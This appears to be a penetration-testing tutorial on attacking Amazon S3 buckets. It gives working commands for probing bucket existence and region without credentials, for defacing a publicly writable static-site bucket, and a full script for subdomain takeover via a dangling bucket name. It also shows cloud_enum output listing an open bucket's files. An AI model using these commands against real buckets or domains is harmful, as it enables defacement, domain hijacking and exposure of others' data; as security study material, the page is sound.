S3 Buckets

S3 overview and attacks

What is an S3 Bucket?

Amazon S3 (Simple Storage Service) is an object storage service that lets you store and retrieve any amount of data from anywhere on the web. It is designed for virtually unlimited scalability, high availability, and durability, with pay-as-you-go pricing. Access to data is controlled through bucket policies, ACLs, and IAM permissions, which determine who can read or write the bucket's contents.

URL Format

S3 bucket names have to be globally unique because every bucket is addressable by URL, e.g.,
  • https://[bucketName].s3.amazonaws.com (virtual-hosted style)
  • https://s3-[region].amazonaws.com/[bucketName] (legacy path style)
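Because names are global, the existence of a bucket can be probed unauthenticated just from the HTTP status code. A minimal sketch (the bucket name below is a made-up example):

```shell
# Probe whether a bucket name exists; no AWS credentials required.
# The bucket name is a hypothetical example.
bucket="tyler123kjdf"
code=$(curl -s -o /dev/null -w '%{http_code}' "https://${bucket}.s3.amazonaws.com/" || true)

# 404 (NoSuchBucket) -> the name is unclaimed
# 403 (AccessDenied) -> the bucket exists but is private
# 200                -> the bucket exists and its contents are listable
echo "status: ${code}"
```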

Identify Region

S3 buckets reside and store data in a particular region. We can discover the region in a few ways.
  • nslookup [bucketName].s3.amazonaws.com (the CNAME chain often embeds the region)
  • curl -I [bucketName].s3.amazonaws.com (check the x-amz-bucket-region response header)
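For example, S3 returns the bucket's region in the x-amz-bucket-region header even on 403 responses, so the region of a private bucket can be read without credentials (bucket name is a hypothetical example):

```shell
# Read the bucket's region from S3's response headers; the header is
# present even when the request itself is denied (403).
# The bucket name is a hypothetical example.
bucket="tyler123kjdf"
headers=$(curl -sI "https://${bucket}.s3.amazonaws.com/" || true)

# Extract x-amz-bucket-region, case-insensitively
region=$(printf '%s\n' "$headers" | tr -d '\r' \
  | awk -F': ' 'tolower($1)=="x-amz-bucket-region" {print $2}')
echo "region: ${region}"
```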

Code Injection

If an S3 bucket hosting a static website allows public writes (s3:PutObject), an attacker can use aws s3 cp or aws s3 mv to replace the site's pages with malicious content.
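A hypothetical defacement might look like the following, assuming the bucket permits unauthenticated writes; the bucket name is made up for illustration:

```shell
# Overwrite the live index page of a world-writable static-site bucket.
# The bucket name "victim-static-site" is a hypothetical example.
bucket="victim-static-site"
echo '<h1>defaced</h1>' > index.html

# --no-sign-request sends the request unauthenticated; this only succeeds
# if the bucket policy/ACL permits public s3:PutObject
if command -v aws >/dev/null 2>&1; then
  aws s3 cp index.html "s3://${bucket}/index.html" --no-sign-request || echo "upload refused"
fi
```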

Subdomain Takeover

S3 buckets can host static websites and leverage a domain name by having an associated CNAME record configured. If the bucket is deleted but the CNAME still exists, an attacker can create a new bucket and website, effectively routing any traffic to the new website.
This misconfiguration can be discovered by navigating to the domain: the response is a 404 error with the code NoSuchBucket, along with the name of the missing bucket.
Here are the steps to achieve a subdomain takeover.
  1. aws s3api create-bucket --bucket <bucketName> --region <region>
  2. aws s3 website s3://<bucketName> --index-document index.html --error-document error.html
  3. aws s3 cp index.html s3://<bucketName>
  4. aws s3api get-public-access-block --bucket <bucketName>
  5. aws s3api put-public-access-block --bucket <bucketName> --public-access-block-configuration "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"
  6. aws s3api put-bucket-policy --bucket <bucketName> --policy '{"Version":"2012-10-17","Statement":[{"Sid":"PublicReadGetObject","Effect":"Allow","Principal":"*","Action":"s3:GetObject","Resource":"arn:aws:s3:::<bucketName>/*"}]}'
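The steps above can be combined into one script. A sketch, with placeholder bucket name and region (they must match the dangling CNAME's bucket exactly):

```shell
#!/bin/sh
# Reclaim a dangling bucket name and serve attacker content from it.
# BUCKET/REGION are hypothetical placeholders for this sketch.
BUCKET="victim-assets"
REGION="us-east-1"

aws s3api create-bucket --bucket "$BUCKET" --region "$REGION"
# Note: outside us-east-1, create-bucket also requires
#   --create-bucket-configuration LocationConstraint=$REGION

aws s3 website "s3://$BUCKET" --index-document index.html --error-document error.html
aws s3 cp index.html "s3://$BUCKET"

# Lift the bucket-level public access blocks...
aws s3api put-public-access-block --bucket "$BUCKET" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# ...then attach a public-read bucket policy
aws s3api put-bucket-policy --bucket "$BUCKET" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicReadGetObject",
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"$BUCKET"'/*"
  }]
}'
```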

Enumerating S3 Buckets

Since all S3 buckets have a unique, predictable URL, they can be discovered automatically.
One useful tool for this is cloud_enum (cloud_enum.py).

How it Works

  • Pass the script a keyword, i.e., a string expected to be part of the bucket name, e.g., tyler
  • The keyword is mutated into many candidates, e.g., tyler234
  • A DNS lookup is performed for each candidate; this works because every S3 bucket has a resolvable URL
  • If the name resolves, the script attempts to list the bucket contents (s3:ListBucket)
  • Keep in mind that anyone can create a bucket named facebook, so a matching name does not prove who owns it
# python3 ./cloud_enum.py -k tylerexposedbucket234 --disable-gcp --disable-azure
[+] Checking for S3 buckets
OPEN S3 BUCKET: http://tylerexposedbucket234.s3.amazonaws.com/
FILES:
->http://tylerexposedbucket234.s3.amazonaws.com/tylerexposedbucket234
->http://tylerexposedbucket234.s3.amazonaws.com/dogs.txt
->http://tylerexposedbucket234.s3.amazonaws.com/secrets.txt
Protected S3 Bucket: http://tyler.s3.amazonaws.com/
Protected S3 Bucket: http://tyler1.s3.amazonaws.com/
Protected S3 Bucket: http://tyler-1.s3.amazonaws.com/
Protected S3 Bucket: http://tyler2.s3.amazonaws.com/
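The mutation step is easy to reproduce. A minimal sketch in plain shell, where the affix list is an illustrative subset rather than cloud_enum's real wordlist:

```shell
# Build candidate bucket URLs from a keyword plus common affixes.
keyword="tyler"
affixes="backup dev prod 123"

urls=""
for affix in $affixes; do
  for candidate in "${keyword}${affix}" "${keyword}-${affix}" "${affix}-${keyword}"; do
    url="https://${candidate}.s3.amazonaws.com"
    urls="${urls}${url}
"
    echo "$url"
    # cloud_enum would now resolve each name, e.g.:
    # dig +short "${candidate}.s3.amazonaws.com"
  done
done
```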